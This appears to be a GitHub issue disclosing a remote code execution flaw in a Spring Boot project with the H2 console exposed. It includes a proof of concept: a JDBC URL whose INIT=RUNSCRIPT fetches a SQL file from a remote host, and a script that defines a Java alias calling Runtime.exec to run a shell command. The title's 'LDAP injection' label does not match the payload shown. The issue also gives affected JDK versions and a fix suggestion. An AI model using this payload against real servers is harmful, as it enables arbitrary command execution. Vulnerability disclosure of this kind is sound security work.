Unsafe component h2 is referenced, causing ldap injection

url: `http://host:ip/h2-console`
driver Class: `org.h2.Driver`
JDBC URL: `jdbc:h2:mem:dbtest;MODE=MSSQLServer;INIT=RUNSCRIPT FROM 'http://xxx/files/h2.sql'`
and the h2.sql below
```
CREATE ALIAS shel1 As $$void shel1(String s) throws Exception {
  java.lang.Runtime.getRuntime().exec(s);
}$$;
SELECT shel1('open -a Calculator.app');
```

![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/458a75ae-55a6-4925-84a3-8e33771638b5)
![image](https://github.com/qinxuewu/blog-sharon/assets/71647398/63699401-7fdb-49b0-8859-0c9fd6afea1f)

vulnable environment
spring Boot + H2
spring.h2.console.enabled=true
JDK < 6u201、7u191、8u182、11.0.1（LDAP）

修复建议：禁用h2-console enable，或者升级jdk版本

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Unsafe component h2 is referenced, causing ldap injection #2

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Unsafe component h2 is referenced, causing ldap injection #2

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions